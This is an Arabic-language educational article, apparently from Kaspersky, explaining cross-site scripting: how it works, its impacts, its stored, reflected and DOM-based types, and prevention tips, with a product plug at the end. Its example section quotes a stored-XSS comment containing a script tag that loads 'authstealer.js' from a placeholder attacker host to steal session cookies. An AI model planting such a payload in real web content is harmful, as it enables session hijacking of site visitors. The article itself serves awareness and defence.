content/ar-ae/images/repository/isc/2021/what-is-a-cross-site-scripting-attack-1.jpg

ما المقصود بالبرامج النصية للمواقع المشتركة؟

تتضمن هجمات البرامج النصية للمواقع المشتركة - التي تتم كتابتها أحيانًا باسم XSS - حقن تعليمات برمجية ضارة في مواقع الويب التي تكون موثوقًا بها في ظروف أخرى. يحدث هجوم البرامج النصية للمواقع المشتركة عندما يقوم المجرمون الإلكترونيون بحقن البرامج النصية الضارة في محتوى موقع الويب المستهدف، والذي يتم بعد ذلك تضمينه مع المحتوى الديناميكي الذي يتم تقديمه إلى متصفح الضحية. ليس لدى متصفح الضحية أي وسيلة لمعرفة أن البرامج النصية الضارة لا يمكن الوثوق بها وبالتالي يقوم بتنفيذها.

ونتيجة لذلك، يمكن للبرامج النصية الضارة الوصول إلى أي ملفات تعريف ارتباط أو رموز مميزة للجلسة أو أي معلومات حساسة أخرى يحتفظ بها المتصفح ويتم استخدامها داخل هذا الموقع. يمكن للمهاجمين أيضًا استخدام هجمات XSS لنشر البرمجيات الضارة، وإعادة كتابة محتويات مواقع الويب، والتسبب في مشاكل على شبكات التواصل الاجتماعي، والانتحال للحصول على بيانات اعتماد المستخدمين. تختلف هجمات XSS عن هجمات الويب الأخرى من حيث إنها لا تستهدف التطبيق نفسه بشكل مباشر. بل يكون مستخدمو تطبيق الويب هم المعرّضين للخطر.

آلية عمل البرامج النصية للمواقع المشتركة

تعمل البرامج النصية للمواقع المشتركة من خلال التلاعب بموقع ويب مليء بالثغرات بحيث يقوم بإرجاع البرامج النصية الضارة إلى المستخدمين. غالبًا ما يتضمن ذلك استخدام لغة JavaScript، ولكن يمكن استخدام أي لغة من جانب العميل. يستهدف مجرمو الإنترنت مواقع الويب ذات الوظائف المليئة بالثغرات والتي تقبل إدخال المستخدم، مثل أشرطة البحث أو مربعات التعليق أو نماذج تسجيل الدخول. يقوم المجرمون بإرفاق شفرتهم الخبيثة أعلى موقع الويب الشرعي، ما يؤدي بشكل أساسي إلى خداع المتصفحات لتنفيذ برمجيتها الضارة كلما تم تحميل الموقع.

ونظرًا إلى أن JavaScript يعمل على صفحة متصفح الضحية، يمكن سرقة تفاصيل حساسة حول المستخدم الذي تمت المصادقة عليه من الجلسة، ما يسمح للجهات الفاعلة الخبيثة باستهداف مسؤولي الموقع واختراق مواقع الويب.

واعتمادًا على كيفية إدخال التعليمة البرمجية، قد لا يكون المحتوى الضار موجودًا حتى على صفحة الويب الفعلية نفسها بل كعنصر عابر يبدو أنه جزء من موقع الويب في وقت استغلال الثغرة. يمكن أن يخلق هذا فكرة وهمية بأن موقع الويب الفعلي قد تعرّض للاختراق بينما الأمر ليس كذلك.

هناك طرق مختلفة لبدء هجوم XSS. على سبيل المثال، يمكن بدء التنفيذ تلقائيًا عند تحميل الصفحة أو عندما قيام المستخدم بالتمرير فوق عناصر صفحة معينة، مثل الارتباطات التشعبية. في بعض الحالات، يتم تنفيذ هجوم XSS بشكل مباشر أكثر، كما هو الحال مع تنفيذه في رسالة بريد إلكتروني. بعض هجمات XSS ليس لها هدف محدد، فالمهاجم يستغل ببساطة ثغرة أمنية في التطبيق أو الموقع، ويستغل أي شخص لديه من سوء الحظ ما يوقعه ضحيةً له.

وحسب حجم الهجوم، قد يتم اختراق حسابات المستخدمين، وتنشيط برامج حصان طروادة، وتعديل محتوى الصفحة، ما يؤدي إلى تضليل المستخدمين بما يؤول إلى إفشاء بياناتهم الخاصة. يمكن الكشف عن ملفات تعريف الارتباط الخاصة بالجلسات، ما يتيح للجاني انتحال شخصية مستخدمين صالحين وإساءة استخدام حساباتهم الخاصة.

وقد تترتب على هجوم البرامج النصية للمواقع المشتركة الناجح عواقب وخيمة على سمعة الشركة عبر الإنترنت وعلاقتها بعملائها. لسوء الحظ، فإن العيوب التي تسمح بأن تتكلل هجمات XSS بالنجاح منتشرة على نطاق واسع. يمكن لهجمات XSS استغلال الثغرات الأمنية في بيئات البرمجة المختلفة، بما في ذلك VBScript وFlash وActiveX وJavaScript. يستهدف هجوم XSS أساسًا JavaScript بسبب تكامل اللغة الوثيق مع معظم المتصفحات. هذه القدرة على استغلال المنصات الشائعة الاستخدام تجعل هجمات XSS خطيرة وواسعة الانتشار.

تأثير XSS‏

من خلال استغلال ثغرات XSS، يمكن للمهاجم تنفيذ إجراءات ضارة، مثل:

  • إعادة توجيه المستخدمين إلى موقع ويب ضار.
  • الحصول على ضغطات مفاتيح لوحات مفاتيح المستخدمين.
  • الوصول إلى سجل متصفح المستخدم ومحتويات الحافظة.
  • تنفيذ عمليات الاستغلال القائمة على متصفح الويب (على سبيل المثال، التسبب في تعطل المتصفح).
  • الحصول على معلومات ملفات تعريف الارتباط للمستخدم الذي قام بتسجيل الدخول إلى موقع ويب.
  • سرقة الرمز المميز لجلسة تسجيل الدخول، ما يسمح للمهاجم بالتفاعل مع التطبيق باعتباره الضحية دون معرفة كلمة المرور الخاصة به.
  • إجبار المستخدم على إرسال طلبات يتحكم فيها المهاجم إلى خادم.
  • تغيير محتويات الصفحة.
  • خداع الضحية لإفشاء كلمة المرور الخاصة به إلى التطبيق أو التطبيقات الأخرى.
  • إصابة الضحية بتعليمات برمجية ضارة أخرى باستخدام ثغرة أمنية في متصفح الويب نفسه وربما السيطرة على كمبيوتر الضحية.

في بعض الحالات، يمكن أن يؤدي هجوم XSS إلى اختراق كامل لحساب الضحية. كما يمكن للمهاجمين خداع المستخدمين لإدخال بيانات الاعتماد في استمارة مزيفة، وهو ما يوفر جميع المعلومات للمهاجم. بمجرد الحصول على بيانات اعتماد المستخدم، يمكن استخدامها عن طريق الهجمات لارتكاب جريمة سرقة الهوية أو الاحتيال المالي.

أنواع هجمات XSS‏

يمكن تصنيف البرامج النصية للمواقع المشتركة إلى ثلاث فئات رئيسية - هجوم XSS المخزن، وهجوم XSS المنعكس، وهجوم XSS المستند إلى نموذج كائن المستند (DOM).

هجوم البرامج النصية للمواقع المشتركة المخزّن (هجوم XSS المستمر)

يُعتبر هجوم XSS المخزّن، والمعروف أيضًا باسم هجوم XSS المستمر، أكثر أنواع هجمات XSS إثارة للضرر. يحدث هجوم XSS المخزّن عندما يتم تخزين الإدخال الذي يوفره المستخدم ثم يتم عرضه داخل صفحة ويب. تشمل نقاط الدخول النموذجية لهجوم XSS المخزّن منتديات الرسائل والتعليقات في المدونة وملفات تعريف المستخدمين وحقول اسم المستخدم. يستغل المهاجم عادةً هذه الثغرة عن طريق حقن حمولات XSS على صفحات شائعة من موقع ما أو تمرير رابط إلى ضحية، ما يؤدي إلى خداعه ليقوم باستعراض الصفحة التي تحتوي على حمولة هجوم XSS المخزّن. يزور الضحية الصفحة ويتم تنفيذ الحمولة من جانب العميل بواسطة متصفح الويب الخاص بالضحية.

البرامج النصية للمواقع المشتركة المنعكسة (هجوم XSS غير المستمر)

يُعرف النوع الأكثر شيوعًا من هجوم XSS باسم هجوم XSS المنعكس (ويُعرف أيضًا باسم هجوم XSS غير المستمر). في هذه الحال، يجب أن تكون حمولة المهاجم جزءًا من الطلب المرسل إلى خادم الويب. ثم يتم عكسه مرة أخرى بطريقة تجعل استجابة HTTP تتضمن الحمولة القادمة من طلب HTTP. يستخدم المهاجمون الروابط الخبيثة ورسائل البريد الإلكتروني للانتحال وأساليب الهندسة الاجتماعية الأخرى لخداع الضحية لتقديم طلب إلى الخادم. ويتم بعد ذلك تنفيذ حمولة هجوم XSS المنعكس في متصفح المستخدم.

لا يعدّ هجوم XSS المنعكس هجومًا مستمرًا، ومن ثمّ يحتاج المهاجم إلى تسليم الحمولة إلى كل ضحية. وغالبًا ما تتم هذه الهجمات باستخدام شبكات التواصل الاجتماعي.

البرامج النصية للمواقع المشتركة المستندة إلى نموذج كائن المستند (DOM)

يشير هجوم XSS المستند إلى نموذج كائن المستند (DOM) إلى ثغرة في البرامج النصية للمواقع المشتركة تظهر في نموذج كائن المستند (DOM) بدلاً من جزء من HTML. في هجمات البرامج النصية للمواقع المشتركة المنعكسة والمخزنة، يمكنك رؤية حمولة الثغرة في صفحة الرد، ولكن في البرامج النصية للمواقع المشتركة المستندة إلى نموذج كائن المستند (DOM)، ستكون التعليمة البرمجية المصدر لـ HTML للهجوم والرد متطابقين، أي لا يمكن العثور على الحمولة في الرد. ولا يمكن ملاحظتها إلا في وقت التشغيل أو من خلال التحقق من نموذج كائن المستند (DOM) للصفحة.

غالبًا ما يكون هجوم XSS المستند إلى نموذج كائن المستند (DOM) هجومًا من جانب العميل، ولا يتم على الإطلاق إرسال الحمولة الضارة إلى الخادم. وهذا يزيد من صعوبة الاكتشاف من خلال جدران حماية تطبيقات الويب (WAF) ومهندسي الأمان الذين يحللون سجلات الخادم لأنهم لم يروا الهجوم مطلقًا. تتضمن كائنات نموذج كائن المستند (DOM) التي يتم التلاعب بها غالبًا عنوان URL ‏(document.URL) وجزء الإرساء من عنوان URL ‏(location.hash) وجهة الإحالة (document.referrer).

البرامج النصية للمواقع المشتركة

مثال لهجمات XSS‏

على سبيل المثال: أثناء تصفح أحد مواقع التجارة الإلكترونية، تحدد الجهة الفاعل الخبيثة ثغرة تسمح بتضمين علامات HTML في قسم التعليقات في الموقع. تصبح العلامات المضمنة ميزة دائمة للصفحة، ما يتسبب في قيام المستعرض بتضمينها مع باقي التعليمات البرمجية المصدر في كل مرة يتم فيها فتح الصفحة.

يضيف المهاجم تعليقًا على غرار هذه السطور: عنصر ذو قيمة كبيرة. تفضل بقراءة مراجعتي الكاملة هنا <script src=”http://attackersite.com/authstealer.js”> </script>.

بعد ذلك، في كل مرة يتم فيها الوصول إلى الصفحة، ستقوم علامة HTML الموجودة في التعليق بتفعيل ملف JavaScript، والذي تتم استضافته على موقع آخر ويمكنه سرقة ملفات تعريف ارتباط جلسات الزائرين.

يمكن للمهاجم، باستخدام ملف تعريف ارتباط الجلسة، اختراق حساب الزائر، ما يمنحه وصولاً سهلاً إلى معلوماته الشخصية وبياناته المالية. في هذه الأثناء، لا يزال الزائر، الذي ربما لم يمرر للانتقال إلى قسم التعليقات، غير مدرك لوقوع الهجوم.

وعلى عكس الهجوم المنعكس، حيث يتم تنشيط البرنامج النصي بعد النقر فوق ارتباط ما، لا يتطلب الهجوم المخزن إلا زيارة الضحية لصفحة الويب المخترقة. وهذا يزيد من مدى الهجوم، ما يعرض جميع الزائرين للخطر بغض النظر عن مدى حذرهم.

من وجهة نظر المهاجم، يكون تنفيذ هجمات XSS المستمرة أكثر صعوبةً بسبب الصعوبات المتمثلة في تحديد موقع كل من موقع ويب تم الاتجار به وآخر به ثغرات تتيح تضمين البرنامج النصي بشكل دائم.

الوقاية من البرامج النصية للمواقع المشتركة

لتقليل ثغرات البرامج النصية للمواقع المشتركة، يجب على مطوري/مالكي مواقع الويب:

  • التأكد من أن أي صفحة على موقع الويب تقبل إدخال المستخدم تقوم بتصفية مدخلات التعليمات البرمجية، مثل HTML وJavaScript.
  • البحث عن أي ثغرات في تطبيق الويب وتصحيحها بناءً على ذلك.
  • تحديث موقع الويب وبرنامج الخادم الخاصين بهم لمنع الاستغلال المستقبلي للثغرات التي قد يتم استهدافها من خلال هجوم XSS.

 

لتجنب الوقوع ضحية لهجوم XSS، يجب على المستخدمين الأفراد:

  • تعطيل البرمجة النصية على الصفحات التي لا تكون مطلوبة فيها أو تعطيلها تمامًا.
  • تجنب النقر فوق الروابط الواردة من رسائل البريد الإلكتروني المشبوهة أو المنشورات على لوحات الرسائل؛ لأنها قد تؤدي إلى اختراق الصفحات.
  • الوصول إلى مواقع الويب مباشرةً عن طريق كتابة عنوان URL في متصفحهم بدلاً من مصدر أو رابط تابع لجهة خارجية.
  • المداومة على تحديث البرامج للاستفادة من أحدث إصلاحات الأخطاء وتصحيحات الأمان. سيؤدي تحديث البرنامج بانتظام إلى تقليل الثغرات التي تجعل الموقع أو التطبيق متقبلاً لهجمات XSS بشكل كبير.
  • إخضاع التطبيقات للتدقيق لتحديد أيها المطلوب وأيها الذي نادرًا ما يتم استخدامه. التخلص من التطبيقات التي لا تستخدمها يقلل من عدد الثغرات المحتملة.
  • استخدام برنامج مكافحة فيروسات عالي الجودة، مثل Kaspersky Total Security؛ فهو يعمل على مدار الساعة طوال أيام الأسبوع لتأمين أجهزتك وبياناتك. فهو يحظر التهديدات الشائعة والمعقدة مثل الفيروسات والبرمجيات الضارة وبرامج طلب الفدية وتطبيقات التجسس وأحدث حيل المتسللين جميعها.

مقالات ذات صلة:

ما المقصود بهجوم البرامج النصية للمواقع المشتركة؟ التعريف والشرح

ما المقصود بالبرامج النصية للمواقع المشتركة؟ تعرف على الثغرات في البرامج النصية للمواقع المشتركة وهجماتها والوقاية منها.
Kaspersky Logo